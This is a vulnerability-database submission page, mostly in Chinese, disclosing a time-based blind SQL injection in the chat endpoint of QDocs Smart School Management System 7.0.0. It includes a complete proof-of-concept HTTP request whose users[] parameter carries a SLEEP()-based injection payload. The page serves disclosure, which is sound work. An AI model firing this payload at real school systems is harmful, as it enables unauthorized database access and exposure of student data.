提交 #407385: QDocs QDocs Smart School Management System 7.0.0 SQL Injection信息

标题	QDocs QDocs Smart School Management System 7.0.0 SQL Injection
描述	A time-based blind SQL injection vulnerability has been discovered in the QDocs Smart School Management System, specifically in the chat system. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. This allows an authenticated attacker, with student privileges, to inject malicious SQL queries that can delay the server’s response using the SLEEP() function, thereby confirming the presence of an injection vulnerability without directly revealing data. This kind of attack can be leveraged to infer sensitive information or cause unauthorized actions within the database, which could compromise the integrity and confidentiality of the system. Impact: Execute Arbitrary SQL Commands Infer Sensitive Information Compromise Data Integrity Proof of Concept (PoC): POST /user/chat/mynewuser HTTP/1.1 Host: [placeholder-host] Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft Content-Length: 79 Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126" Accept-Language: en-US Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Linux" Origin: https://[placeholder-host] Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://[placeholder-host]/webtest/user/chat Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM Discovered By: Jobyer Ahmed
来源	⚠️ https://github.com/bytium/vulnerability-research/blob/main/Advisory%20for%20Time-Based%20Blind%20SQL%20Injection%20in%20QDocs%20Smart%20School.md
用户	suffer (UID 74855)
提交	2024-09-12 23時41分 (2 年前)
管理	2024-09-13 15時09分 (15 hours later)
状态	已接受
VulDB条目	277435 [QDocs Smart School Management System 7.0.0 Chat /user/chat/mynewuser users[] SQL注入]
积分	20

◂ 上一步一览下一步 ▸

Interested in the pricing of exploits?

See the underground prices here!